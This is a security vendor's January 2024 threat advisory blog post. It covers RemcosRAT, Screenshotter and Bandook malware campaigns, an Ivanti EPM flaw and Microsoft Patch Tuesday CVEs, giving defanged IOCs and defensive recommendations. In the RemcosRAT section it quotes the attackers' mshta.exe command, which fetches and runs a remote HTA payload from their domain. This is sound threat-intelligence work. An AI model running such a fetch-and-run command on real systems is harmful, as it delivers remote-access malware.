Home >  Blog >  January 2024 Threat Advisory – Top 5

Monthly Advisory • 10 MIN READ

January 2024 Threat Advisory – Top 5

by Eleanor Barlow • Jan 2024

SecurityHQ’s Monthly Threat Report, Drawn from Recent Advisories of January 2024.

UAC-0050 Group Targets the Ukraine Using RemcosRAT

Threat Reference: Global

Risks: Data Breach and Remote Access

Advisory Type: Threats

Priority: Standard

The UAC-0050 Hacker group is targeting the Ukrainian government and associated agencies by using RemcosRAT pipe methods for evasion. RemcosRAT (Remote Control Surveillance) allows the threat actor to gain remote control access of the infected system, to spy, and commit data theft.

How the Attack Scenario Works

  • The victim receives a Phishing/Spam email with attached .LNK file.
  • LNK file starts process by downloading HTA File.
  • HTA file Contains VBS Script that triggers a PowerShell Script to download “word_update.exe” from a server.
  • Once victim executes ‘word_update.exe’ it launches cmd.exe and shares malicious data through a pipe.
  • This eventually results in the launch of explorer.exe, carrying the malicious RemcosRAT in its memory.
  • At the end of the .lnk file, the attacker has obfuscated the URL. This address is run using MSHTA (a Microsoft HTML Application) via the below command: c:\windows\system32\mshta.exe” http[:]//new-tech-savvy[.]com/6[.]hta

Indicators Of Compromise (IOCs) IP Addresses:

  • 194[.]87.31[.]229
  • 46[.]249.58[.]40

Domains/URLs:

  • new-tech-savvy[.]com/6.hta
  • new-tech-savvy[.]com/5[.]hta
  • new-tech-savvy[.]com/algo[.]hta
  • new-tech-savvy[.]com/shablon[.]hta
  • new-tech-savvy[.]com/word_update[.]exe
  • new-tech-savvy[.]com/zayava[.]docx
  • new-tech-savvy[.]com/ofer[.]docx

Recommendation

  1. Use advanced email filters to automatically find and remove spam before it reaches your inbox.
  2. Don’t click on links or open attachments in emails marked as spam. Read ‘New Wave of Spear Phishing Emails within HTML Attachment- An Analysts View’, and ‘10 Top Tips to Detect Phishing Scams’.
  3. Use network monitoring tools which can prevent unknown data communications and remote access.

Ivanti Released Patch to Fix Critical Vulnerability Affecting Ivanti EPM

Threat Reference: Global

Risks: Remote Code Execution, Arbitrary Code Execution, SQL Injection and Unauthenticated Access.

Advisory Type: Updates/Patches

Priority: Standard

Ivanti has released a security update to fix a critical vulnerability impacting Ivanti EPM. Successful exploitation of this vulnerability could result in Remote Code Execution, Arbitrary Code Execution, SQL Injection and Unauthenticated Access.

Affected products include Ivanti EPM 2021/EPM 2022 prior to SU5.

Notable CVEs

[Critical] – CVE-2023-39336 – CVSS – [9.6] – This vulnerability allows an attacker to gain access to the internal network and exploit unspecified SQL injection to perform arbitrary SQL queries to gain control over machines running the EPM agent. When the core server is configured with SQL express, this might lead to Remote Code Execution on the core server.

Recommendation

It is recommended to update the affected Ivanti EPMM to the latest patch/version.

Microsoft Released January 2024 Patch Tuesday for 49 Flaws Including 12 Remote Code Execution

Threat Reference:  Global

Risks: Remote Code Execution, Elevation of Privilege, Security Feature Bypass, Information Disclosure, Spoofing and Denial of Service.

Advisory Type: Updates/Patches

Priority: Standard

Microsoft has released Patch Tuesday for January 2024 with security updates for 49 flaws, including 12 Remote code Execution Vulnerabilities. Successful exploitation of these vulnerabilities could result in Remote Code Execution, Elevation of Privilege, Security Feature Bypass, Information Disclosure, Spoofing and Denial of Service.

Affected products include Microsoft Office, Visual Studio, Azure, SQL Servers.

Notable CVEs ID:

  • [Critical] CVE-2024-0057 – NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability
  • [Critical] CVE-2024-20674 – Windows Kerberos Security Feature Bypass Vulnerability
  • [Critical] CVE-2024-20700 – Windows Hyper-V Remote Code Execution Vulnerability
  • [Important] CVE-2024-0056 – Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability
  • [Important] CVE-2024-20652 – Windows HTML Platforms Security Feature Bypass Vulnerability
  • [Important] CVE-2024-20653 – Microsoft Common Log File System Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20654 – Microsoft ODBC Driver Remote Code Execution Vulnerability
  • [Important] CVE-2024-20655 – Microsoft Online Certificate Status Protocol (OCSP) Remote Code Execution Vulnerability
  • [Important] CVE-2024-20656 – Visual Studio Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20657 – Windows Group Policy Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20658 – Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20660 – Microsoft Message Queuing Information Disclosure Vulnerability
  • [Important] CVE-2024-20661 – Microsoft Message Queuing Denial of Service Vulnerability
  • [Important] CVE-2024-20662 – Windows Online Certificate Status Protocol (OCSP) Information Disclosure Vulnerability
  • [Important] CVE-2024-20663 – Windows Message Queuing Client (MSMQC) Information Disclosure
  • [Important] CVE-2024-20664 – Microsoft Message Queuing Information Disclosure Vulnerability
  • [Important] CVE-2024-2066 – BitLocker Security Feature Bypass Vulnerability
  • [Important] CVE-2024-20672 – .NET Core and Visual Studio Denial of Service Vulnerability
  • [Important] CVE-2024-20676 – Azure Storage Mover Remote Code Execution Vulnerability
  • [Important] CVE-2024-20677 – Microsoft Office Remote Code Execution Vulnerability
  • [Important] CVE-2024-20680 – Windows Message Queuing Client (MSMQC) Information Disclosure
  • [Important] CVE-2024-20681 – Windows Subsystem for Linux Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20682 – Windows Cryptographic Services Remote Code Execution Vulnerability
  • [Important] CVE-2024-20683 – Win32k Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20686 – Win32k Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20687 – Microsoft AllJoyn API Denial of Service Vulnerability
  • [Important] CVE-2024-20690 – Windows Nearby Sharing Spoofing Vulnerability
  • [Important] CVE-2024-20691 – Windows Themes Information Disclosure Vulnerability
  • [Important] CVE-2024-20692 – Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability
  • [Important] CVE-2024-20694 – Windows CoreMessaging Information Disclosure Vulnerability
  • [Important] CVE-2024-20696 – Windows Libarchive Remote Code Execution Vulnerability
  • [Important] CVE-2024-20697 – Windows Libarchive Remote Code Execution Vulnerability
  • [Important] CVE-2024-20698 – Windows Kernel Elevation of Privilege Vulnerability
  • [Important] CVE-2024-20699 – Windows Hyper-V Denial of Service Vulnerability
  • [Important] CVE-2024-21305 – Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability
  • [Important] CVE-2024-21306 – Microsoft Bluetooth Driver Spoofing Vulnerability
  • [Important] CVE-2024-21307 – Remote Desktop Client Remote Code Execution Vulnerability
  • [Important] CVE-2024-21309 – Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
  • [Important] CVE-2024-21310 – Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
  • [Important] CVE-2024-21311 – Windows Cryptographic Services Information Disclosure Vulnerability
  • [Important] CVE-2024-21312 – .NET Framework Denial of Service Vulnerability
  • [Important] CVE-2024-21313 – Windows TCP/IP Information Disclosure Vulnerability
  • [Important] CVE-2024-21314 – Microsoft Message Queuing Information Disclosure Vulnerability
  • [Important] CVE-2024-21316 – Windows Server Key Distribution Service Security Feature Bypass
  • [Important] CVE-2024-21318 – Microsoft SharePoint Server Remote Code Execution Vulnerability
  • [Important] CVE-2024-21319 – Microsoft Identity Denial of service vulnerability
  • [Important] CVE-2024-21320 – Windows Themes Spoofing Vulnerability
  • [Important] CVE-2024-21325 – Microsoft Printer Metadata Troubleshooter Tool Remote Code Execution Vulnerability

Recommendation

It is recommended to update all the affected products to the latest available patch version.

New Threat Actor (TA866) Dropping “Screenshotter” Malware Via Phishing Campaign

Threat Reference: Global

Risks:  Malware

Advisory Type: Threats

Priority: Standard

Security researchers have observed TA866 Threat Actor dropping “Screenshotter” malware via phishing campaign targeting organizations.

How the Attack Scenario Works

  1. User receives a phishing email containing malicious URL.
  2. Malicious URL once clicked leads to 404 TDS (Traffic Distribution System) which filters the traffic and downloads a JavaScript file.
  3. If the User executes JavaScript file, an MSI package called “WasabiSeed installer” is downloaded.
  4. MSI package later executes an embedded VBS script and establishes persistence on the victim’s system by creating an autorun in the startup folder. The VBS script later downloads and executes a second MSI file containing a malware called “Screenshotter”.
  5. As the name suggests, the malware takes screenshot of the victim’s screen and shares them with command and control (C2) server. If the attacker is satisfied with the screenshots, WasabiSeed downloads a post-exploitation payload AHK Bot which further downloads scripts like Domain profiler (collecting AD Information) and stealer loader (memory executable infostealer).
  6. Stealer loader again loads “Rhadamanthys” infostealer which collects sensitive information such as user credentials from browsers, FTP clients, chat bots, email clients, and VPN configurations.

Indicators Of Compromise (IOCs), IP Addresses:

  • 79[.]137[.]198[.]60
  • 109[.]107[.]173[.]72
  • 89[.]208[.]105[.]255
  • Domains/URLs:
  • southfirstarea[.]com
  • peak-pjv[.]com
  • otameyshan[.]com
  • thebtcrevolution[.]com
  • annemarieotey[.]com
  • expresswebstores[.]com
  • styleselect[.]com
  • mikefaw[.]com
  • fgpprlaw[.]com
  • duncan-technologies[.]net
  • black-socks[.]org
  • virtualmediaoffice[.]com
  • samsontech[.]mobi
  • footballmeta[.]com
  • gfcitservice[.]net
  • listfoo[.]org
  • duinvest[.]info
  • shiptrax24[.]com
  • repossessionheadquarters[.]org
  • bluecentury[.]org
  • moosdies[.]top

Recommendation

• It is recommended to onboard all your external facing web servers with SecurityHQ SOC to monitor similar attack techniques.

• SecurityHQ Recommends blocking unknown file extensions on Email Gateway.

• Deploy Endpoint Detection & Response (EDR) tools to detect latest malwares and suspicious activities on endpoints.

• Monitor your IT infrastructure 24×7 for cybersecurity attacks and suspicious activities.

New Variant of Bandook Malware Targeting Organizations Globally

Threat Reference: Global

Risks: Malware

Advisory Type: Threat Intel

Priority: Standard

Researchers have identified a new variant of Bandook malware targeting organizations globally. It should be noted that the new variant attack is more focused on Windows operating systems.

How the Attack Scenario Works

  1. Victim receives an email with attached PDF file.
  2. PDF file contains shortened URL to download password protected .7z file and password to extract the zip file.
  3. After victim extracts the zip using the provided password, the malware injects the payload into msinfo32[.]exe
  4. Once injected Bandook malware uses predetermined strings for the key names of registries, flags, APIs to stealthy communication with its C2 Server.
  5. These key values are instructions given to malware to perform specific tasks.
  6. Bandook malware also creates a registry key containing another control code that enables its payload to establish persistence and maintain access to compromised device.

Indicators Of Compromise (IOCs) IP Addresses:

77[.]91[.]100[.]237

45[.]67[.]34[.]219

Recommendation

• Monitor the network for presence of mentioned Indicator of Compromise (IOCs).

• Ensure access to publicly exposed devices, servers are restricted to known recipients. It is recommended to regularly check the publicly exposed assets for vulnerabilities and the feasibility to access the required application via VPN instead of publicly over the internet directly.

• Keep all security solutions, operating systems, software, and firmware up to date.

• Ensure network based and host-based monitoring solutions are in place and configured to highlight any security issues identified along with proper logging.

Threat Intelligence for the Future

SecurityHQ’s Threat Intelligence team is a cohesive global unit dedicated to Cyber Threat Intelligence. Our team is focused on researching emerging threats, tracking activities of threat-actors, ransomware groups, and campaigns, to ensure that they stay ahead of potential risks. Beyond their investigative work, the Intelligence team provides actionable threat intelligence and research, enriching the understanding of SecurityHQ’s customers worldwide. United by a common commitment, the SecurityHQ Threat Intelligence team delivers the insights needed to confidently navigate the intricacies of the cyber security threat landscape.

For more information on these threats, speak to an expert here. Or if you suspect a security incident, you can report an incident here.